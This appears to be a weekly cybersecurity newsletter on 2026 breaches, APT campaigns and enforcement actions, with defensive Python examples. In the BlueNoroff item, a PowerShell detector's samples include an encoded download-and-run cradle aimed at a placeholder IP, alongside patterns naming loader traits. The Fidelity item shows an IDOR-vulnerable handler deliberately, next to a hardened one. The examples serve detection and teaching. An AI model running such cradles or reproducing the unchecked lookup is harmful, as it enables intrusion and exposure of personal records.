👋 Welcome to The CyberSignal Weekly Briefing.
This week, the adversary didn't need a zero-day. They needed patience. A China-linked group sat dormant inside 12 critical networks for eight months before deploying its payload. A ransomware gang breached a healthcare center in May 2025, and its patients were not notified for close to a year. ShinyHunters didn't touch Amtrak directly — they went through Salesforce and pivoted in. The threads connecting every major story this week are the ones defenders keep underestimating: dwell time, trust abuse, and the gap between what policy says and what production enforces. That gap is where the real damage accumulates.
There's a lot to cover. Let's get into it.
📣 Announcement
The CyberSignal Daily is live.
We've launched a free daily briefing — five top stories, key numbers, and an editorial signal, every morning in under 5 minutes. Same voice, same focus, every day.
🔎 Overview: What Shifted in Cyber Since Last Week
Shadow-Earth-053 disclosed — China's newest APT lurked in 12+ NATO-aligned networks for 8 months undetected
Handala doxxed 2,379 US Marines — sent WhatsApp missile threats to active-duty service members, attributed to Iran's MOIS
ShinyHunters claimed 9.4M Amtrak records — via Salesforce; 2.1M confirmed on Have I Been Pwned
Sandhills Medical notified 169,017 patients — nearly a year after Inc Ransom published their data publicly
FBI Operation Winter SHIELD wrapped — 10 controls every organization should already be enforcing
BlueNoroff deepfaked Zoom video — planted a 66-day fileless implant in a Web3 firm
Medtronic confirmed ShinyHunters breach — 9M records, same Salesforce chain as Amtrak and ADT
APT28 patch left a zero-click hole open — researchers found the fix was incomplete within days
North Korea planted npm malware via fake US companies — using AI-generated personas and front firms
Kettering Health: 1.7M patients exposed — Interlock ransomware spent 41 days inside undetected
🔥 Top Stories
01 — Shadow-Earth-053: China's Newest Spy Group Found Lurking in Critical Networks
Nation-State Cyber Threats
A previously undocumented China-linked group infiltrated 12+ critical networks across Poland and Asia — sitting dormant for up to eight months before activating ShadowPad. Researchers at TrendAI describe it as "the younger brother and sister of the Typhoon campaigns." Targets: defense contractors, government agencies, and transportation firms in NATO-aligned nations. Poland's presence on the victim list is significant — it is a NATO frontline anchor and the primary logistics hub for Western military aid to Ukraine.
Why it matters: Eight months of dormancy is not a failure — it is the operation. Shadow-Earth-053 is pre-positioning, not collecting. The question isn't whether you've been breached. It's whether you'd know.
02 — Iran-Linked Handala Leaks 2,379 US Marines' Data and Sends WhatsApp Missile Threats
Nation-State Cyber Threats
Handala published names and phone numbers of 2,379 US Marines in the Persian Gulf and sent direct WhatsApp messages warning of targeting by Shahed drones and Kheibar missiles. The DOJ attributes the operation to Iran's MOIS. The data may have come from data brokers, not a military breach — but the messages were real, received by real service members, with real psychological impact.
Why it matters: The goal was never the data. It was the feeling of being surveilled. That works whether the intelligence is real or not.
03 — ShinyHunters Claims 9.4M Amtrak Records via Salesforce
Data Breaches
ShinyHunters claimed 9.4 million Amtrak records via the same Salesforce social engineering playbook used against ADT, Udemy, Medtronic, Vimeo, and Cisco this year. A dataset of 2.1 million unique accounts is confirmed on Have I Been Pwned. Amtrak has not commented. The most dangerous element isn't the email addresses — it's the customer support interaction records, which reveal travel patterns and routes, enabling hyper-targeted follow-on phishing.
Why it matters: ShinyHunters operationalized Salesforce as a master key. The group is not exploiting a Salesforce vulnerability; it is running one social engineering script against Salesforce customers and reusing it across dozens of tenants at once. More disclosures are coming.
04 — Inc Ransom Breach at Sandhills Medical: 169,017 Patients Notified 12 Months Later
Ransomware
Inc Ransom breached Sandhills Medical Foundation in May 2025 and published the stolen data publicly in June 2025. Patient notifications went out April 28, 2026 — nearly a year after discovery and roughly 300 days after the data became freely downloadable. SSNs, TINs, passports, medical records, and financial information for 169,017 rural South Carolina patients were exposed. HIPAA's Breach Notification Rule allows at most 60 calendar days from discovery. Sandhills took close to a year, with the data already public for 300 of those days.
Why it matters: This isn't delayed disclosure — it's the patient bearing all the risk alone. Expect HHS OCR action.
05 — FBI Operation Winter SHIELD: 10 Controls Every Organization Should Already Have
Policy & Government
The FBI's nine-week Operation Winter SHIELD campaign wrapped this week — connecting each of its ten defensive priorities to a real bureau investigation. The message is blunt: most breaches happen not because organizations chose the wrong tool, but because they don't enforce what they already know works. Microsoft publicly backed the initiative. Top priorities: third-party risk management and phish-resistant MFA — the two controls the FBI keeps watching fail in production.
Why it matters: Run the checklist against production, not policy documents. For each control, ask: enforced or just documented? The answer will be uncomfortable.
06 — BlueNoroff Used AI Deepfake Zoom Video to Plant a 66-Day Fileless Implant
Nation-State Cyber Threats
North Korea's BlueNoroff used AI-generated deepfake video on a live Zoom call to trick a Web3 firm employee into running a fileless PowerShell payload. The implant operated undetected for 66 days. Nothing ever touched disk. The operation targeted crypto holdings and marks DPRK's first confirmed use of real-time deepfake video impersonation — beyond fake LinkedIn profiles into live calls.
Why it matters: If the attacker looks and sounds like your colleague on a live call, awareness training built around spotting fakes will fail some of the time. Detection has to move to what the payload does on the endpoint: PowerShell script block logging, anomalous parent processes spawning PowerShell, and unexpected outbound connections from the user's machine during and after the call.
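One concrete layer of that endpoint-side detection, as an added example written for this briefing (constructed; not BlueNoroff's tooling, not a vendor rule, and not tied to any indicator from the incident): a scorer for PowerShell script block text of the kind event ID 4104 entries carry. It decodes `-EncodedCommand` payloads (UTF-16LE inside base64) and scores the decoded text as well, because a download cradle hidden behind an encoded command never appears in the outer command line. The trait patterns, the threshold, and the sample events are assumptions.

```python
"""Added example (constructed, not BlueNoroff's tooling or any vendor's rule):
score PowerShell script block text for traits of fileless loaders, decoding
-EncodedCommand payloads and scoring the decoded text too. Patterns,
thresholds, and sample events are assumptions made for this illustration."""
import base64
import re

# Traits commonly seen in in-memory PowerShell loaders. Each key is a trait name.
PATTERNS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "evasion_flags": re.compile(
        r"-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-ExecutionPolicy\s+bypass|-ep\s+bypass", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
}
# -enc / -ec / -EncodedCommand followed by base64; PowerShell expects UTF-16LE inside.
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text):
    """Return the list of matched trait names. Traits found inside a decoded
    -EncodedCommand payload are prefixed with 'decoded:' so analysts see the layer."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        hits.extend("decoded:" + h for h in score_script_block(decoded))
    return hits


def triage(events, threshold=2):
    """Indexes of events whose trait count reaches the threshold (triage signal, not a verdict)."""
    return [i for i, text in enumerate(events) if len(score_script_block(text)) >= threshold]


def _encode(cmd):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed 4104-style script block texts. 198.51.100.7 is a documentation-range address.
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users | Sort-Object Length",
    "powershell -nop -w hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    "$b=[Convert]::FromBase64String($x); IEX ([Text.Encoding]::UTF8.GetString($b))",
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_script_block(SAMPLE_EVENTS[i]))
```

Script block logging has to be switched on through policy for the full stream to exist; without it there is nothing to score. Treat the trait count as a feed into a SIEM rule rather than a verdict, and maintain an allowlist for admin scripts that legitimately use Invoke-WebRequest so the signal stays usable.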
07 — Massachusetts Fines Fidelity $1.25M for IDOR Breach Exposing 77,000 Customers
Policy & Government
A sequential document ID visible in Fidelity's browser URL let any logged-in customer access any other customer's records — SSNs, credit card numbers, medical information, passports — for three days in August 2024. ~77,000 customers affected. Fidelity also failed to notify many of them, including minor children of affected account holders. Massachusetts filed a $1.25M consent order on April 27.
Why it matters: IDOR in financial systems is entirely preventable: every record lookup has to verify, server-side and on every request, that the authenticated principal is authorized for that specific record, and document identifiers should not be guessable in the first place. "Failure to enforce its own cybersecurity protocols" — that's the whole story. State regulators are filling the enforcement vacuum federal agencies are leaving.
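To make the flaw class concrete, an added example written for this briefing (not Fidelity's code and not any disclosed detail of its system): a document handler with the sequential-ID, no-ownership-check pattern beside a hardened version, plus a simulated logged-in attacker walking the ID range. The store contents, user names, and IDs are constructed.

```python
"""Added example, not Fidelity's code: the IDOR pattern the Massachusetts order
describes (sequential document IDs, no per-request ownership check) beside a
hardened handler. The store, users, and IDs below are constructed."""
import secrets

# Constructed store keyed by sequential IDs, as the vulnerable design assumed.
DOCUMENTS = {
    1001: {"owner": "alice", "body": "alice: tax form with SSN"},
    1002: {"owner": "bob", "body": "bob: statement with card number"},
}


class Forbidden(Exception):
    """Raised for any record the caller may not see; the reason is deliberately not exposed."""


def get_document_vulnerable(session_user, doc_id):
    """Vulnerable: authentication was checked upstream, authorization never is.
    Any logged-in user who edits the ID in the URL gets someone else's record."""
    doc = DOCUMENTS.get(doc_id)
    return None if doc is None else doc["body"]


def get_document_hardened(session_user, doc_id):
    """Hardened: the ownership check runs server-side on every request.
    Missing and foreign records get the same response so the ID space cannot be probed."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != session_user:
        raise Forbidden("not found")
    return doc["body"]


def new_document_id():
    """Defense in depth only: unguessable IDs slow enumeration but never replace the check."""
    return secrets.token_urlsafe(16)


def enumerate_attack(fetch, attacker, start, count):
    """Simulate a logged-in attacker walking a range of sequential IDs.
    Returns the IDs whose contents leaked to the attacker."""
    leaked = []
    for doc_id in range(start, start + count):
        try:
            if fetch(attacker, doc_id) is not None:
                leaked.append(doc_id)
        except Forbidden:
            pass
    return leaked


if __name__ == "__main__":
    print("vulnerable leaks:", enumerate_attack(get_document_vulnerable, "mallory", 1000, 5))
    print("hardened leaks:", enumerate_attack(get_document_hardened, "mallory", 1000, 5))
```

The check belongs in the data-access layer, not in the UI that builds the link, and the "not found" response for both missing and foreign records matters: a 403 on a foreign record confirms to an attacker that the ID exists. Random identifiers cut enumeration speed, but the three-day exposure window in the Fidelity case came from the missing check, not from the ID format.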
📈 Data & Research Corner
| Metric | Figure |
|---|---|
| Amtrak accounts confirmed on Have I Been Pwned | 2.1 million |
| ShinyHunters claimed Amtrak records | 9.4 million |
| Sandhills Medical patients affected | 169,017 |
| Days Inc Ransom data was public before notification | ~300 days |
| Shadow-Earth-053 confirmed network intrusions | 12+ |
| US Marines doxxed by Handala | 2,379 |
| Medtronic records claimed by ShinyHunters | 9 million |
| Roblox accounts hijacked via session cookie theft | 610,000 |
| FBI Operation Winter SHIELD duration | 9 weeks |
| BlueNoroff implant dwell time undetected | 66 days |
🔍 Also On Our Radar
Medtronic confirms ShinyHunters breach — 9M records — Medtronic confirmed a data breach after ShinyHunters claimed 9 million records via the same Salesforce social engineering chain used against Amtrak and ADT. One of the world's largest medical device manufacturers now has a confirmed entry in ShinyHunters' industrialized breach pipeline.
Kettering Health ransomware — 1.7M patients, 41 days undetected — Interlock ransomware spent 41 days inside Kettering Health's network before detection. 1.7 million patients affected across Ohio hospital systems. The dwell time allowed full network mapping before encryption began.
APT28 zero-day patched — but the patch left a zero-click hole open — Microsoft patched a Windows privilege escalation vulnerability exploited by APT28. Within days, researchers found the fix was incomplete, leaving a zero-click attack surface open. CISA added both the original flaw and the bypass to its KEV catalog.
North Korea planted npm malware via fake US companies and AI personas — DPRK operatives registered fake US-incorporated companies, created AI-generated front employees, and used them to push malicious npm packages targeting developer credentials and crypto wallets.
Silk Typhoon-linked hacker extradited to the US over COVID-19 research theft — Xu Zewei, linked to China's Silk Typhoon APT, was extradited from Italy and charged with stealing COVID-19 research and exploiting Microsoft Exchange vulnerabilities against US agencies.
Germany formally blamed Russia for Signal phishing attacks on Bundestag MPs — APT28 is running a targeted Signal phishing campaign against members of the German parliament. Germany issued a formal attribution statement — the second Russian cyber attribution action by a NATO member this month.
🛡️ Actionable Playbook for CISOs & IT Leaders
Audit your Salesforce vendor access immediately. ShinyHunters has hit ADT, Udemy, Medtronic, Vimeo, and Amtrak (the Amtrak dataset is confirmed on Have I Been Pwned; Amtrak itself has not commented) via the same Salesforce social engineering chain in 2026. Review every connected app and third-party integration, the permissions each one holds, and where session and OAuth tokens could be exposed, this week.
Deploy FIDO2 hardware keys for privileged accounts. The FBI's top Operation Winter SHIELD priority exists because SMS OTP, push notifications, and TOTP are all routinely bypassed by criminal toolkits. FIDO2 credentials are bound to the site origin, so the phishing-proxy kits that relay OTP codes and push approvals fail against them. They do not protect a session after login, so pair them with short session lifetimes and monitoring for stolen session cookies.
Hunt for ShadowPad and NoodleRat indicators now. If you are a government agency, defense contractor, or transportation firm in a NATO-aligned country, Shadow-Earth-053's TTPs are public. Run the indicators against your environment before concluding you are clean.
Check haveibeenpwned.com for Amtrak exposure. If you have ever had an Amtrak account or booked Amtrak travel, verify your email in the confirmed HIBP dataset. Support interaction records in this breach enable highly targeted follow-on phishing.
Lock down social media for personnel with deployment history. Handala's operation against US Marines is a template, not a one-off. Service members and government employees with Middle East or high-profile assignment history should remove location data, unit identifiers, and deployment references from all public profiles immediately.
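For the first playbook item above, and the Amtrak story it follows from, an added example written for this briefing (not Salesforce tooling and not telemetry from any of these incidents): a triage script over an export of OAuth token grants. It assumes the export came from a SOQL query along the lines of `SELECT AppName, User.Username, CreatedDate, LastUsedDate, UseCount FROM OauthToken` (the object and field names are an assumption to check against your org) and flags grants to apps outside an allowlist, grants authorized in the last few days, and grants idle long enough to revoke. The allowlist and the three sample rows are constructed.

```python
"""Added example (not Salesforce tooling): triage an export of OAuth token grants
for anomalies worth a human look. Assumes the export came from a SOQL query such as
SELECT AppName, User.Username, CreatedDate, LastUsedDate, UseCount FROM OauthToken
(object and field names are an assumption; verify against your org)."""
import csv
import io
from datetime import datetime, timezone

# Constructed allowlist of connected apps this org expects to see.
ALLOWED_APPS = {"Salesforce for iOS", "Slack"}

# Constructed export; the rows are illustrative, not real data.
SAMPLE_EXPORT = """AppName,Username,CreatedDate,LastUsedDate,UseCount
Salesforce for iOS,alice@example.com,2025-01-10T08:00:00Z,2026-04-27T09:12:00Z,430
Dataloader Bulk,support.temp@example.com,2026-04-25T00:00:00Z,2026-04-26T02:41:00Z,18
Slack,bob@example.com,2025-06-01T12:00:00Z,2025-11-02T00:00:00Z,5
"""


def _ts(value):
    """Parse the ISO-8601 UTC timestamps the export uses."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def audit_oauth_tokens(export_text, allowed_apps, now, stale_days=90, recent_days=7):
    """Return one finding per suspicious grant. Three checks:
    1. the app is not on the allowlist (a tool nobody expects holds a token);
    2. the grant was authorized within recent_days (a successful social
       engineering call leaves a fresh grant behind);
    3. the grant has been idle for more than stale_days (dormant access to revoke)."""
    findings = []
    for row in csv.DictReader(io.StringIO(export_text)):
        reasons = []
        if row["AppName"] not in allowed_apps:
            reasons.append("app not on allowlist")
        created_age = (now - _ts(row["CreatedDate"])).days
        if created_age <= recent_days:
            reasons.append(f"authorized {created_age} days ago")
        idle = (now - _ts(row["LastUsedDate"])).days
        if idle > stale_days:
            reasons.append(f"unused for {idle} days")
        if reasons:
            findings.append({"user": row["Username"], "app": row["AppName"], "reasons": reasons})
    return findings


def run_sample_audit():
    """Run the audit over the constructed export with a fixed clock."""
    now = datetime(2026, 4, 28, tzinfo=timezone.utc)
    return audit_oauth_tokens(SAMPLE_EXPORT, ALLOWED_APPS, now)


if __name__ == "__main__":
    for f in run_sample_audit():
        print(f["user"], f["app"], "; ".join(f["reasons"]))
```

A newly authorized app that nobody recognizes, held by an account with data export rights, is the finding to chase first: that is the shape a successful social engineering call leaves behind. Revoke it, then look at what the token pulled before it was revoked.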
⚡ The Signal
There is a number worth sitting with from this week: 300.
That is roughly how many days the stolen Sandhills Medical patient data — Social Security numbers, passports, medical records, financial information for 169,017 rural South Carolina patients — was freely downloadable on the dark web before those patients received an official notification. HIPAA says 60 days. The patients got 300 days of unmitigated exposure first.
That number is not unusual. It is representative. The Kettering Health intrusion ran 41 days before detection. Shadow-Earth-053 sat in critical networks for eight months. BlueNoroff's fileless implant operated for 66 days. These are not outliers. The dwell time numbers we see week after week describe an industry where detection lags intrusion by months, notification lags discovery by more months, and remediation lags notification by more time still. The compounding of those gaps is where real harm accumulates.
The FBI understands this, which is why Operation Winter SHIELD is not a new framework or a novel technical control — it is a nine-week campaign built around a single uncomfortable observation: the controls that would have prevented most of the breaches the FBI investigated already existed in the victim organizations. They were documented. They were in policy. They were not enforced in production.
ShinyHunters is on track to breach more organizations this year than most security operations centers will detect intrusions. The group has confirmed victims at ADT, Udemy, Medtronic, Vimeo, Cisco, Hallmark, Rockstar Games, and now Amtrak — all via the same Salesforce social engineering chain, all in 2026. No new technique. No zero-day. Just the same playbook, run repeatedly against organizations that have not closed the third-party access gap.
The question worth asking before next week's briefing: if an attacker compromised a trusted vendor with access to your environment today, how long would it be before you knew?
🔭 What to Watch Next Week
HHS OCR and the Sandhills Medical notification delay. Close to a year between breach discovery and patient notification, with the dataset publicly posted for roughly 300 of those days, is a textbook civil money penalty trigger. Watch for enforcement action within 90 days.
Amtrak's official breach disclosure. With 2.1 million accounts confirmed on Have I Been Pwned and no public statement, breach notification clocks are running.
ShinyHunters' next Salesforce target. The group has breached eight or more named organizations via the same vector this year with no slowdown. More disclosures are coming — watch for Salesforce to issue a formal advisory.
Shadow-Earth-053 secondary attribution. TrendAI disclosed the group this week. Expect Mandiant, CrowdStrike, and Microsoft to publish overlapping attribution research within 2-3 weeks.
💡 Pro Tip of the Week
Before you send your next Amtrak booking confirmation to a colleague or post about travel plans — check haveibeenpwned.com and change your Amtrak password now. ShinyHunters' data includes customer support interaction records, which means the follow-on phishing that targets you will sound like it knows exactly where you've been.
Until next time,
Stay sharp. Stay ahead.
The CyberSignal Team
📰 Full coverage at thecybersignal.com
☀️ Daily briefing at daily.thecybersignal.com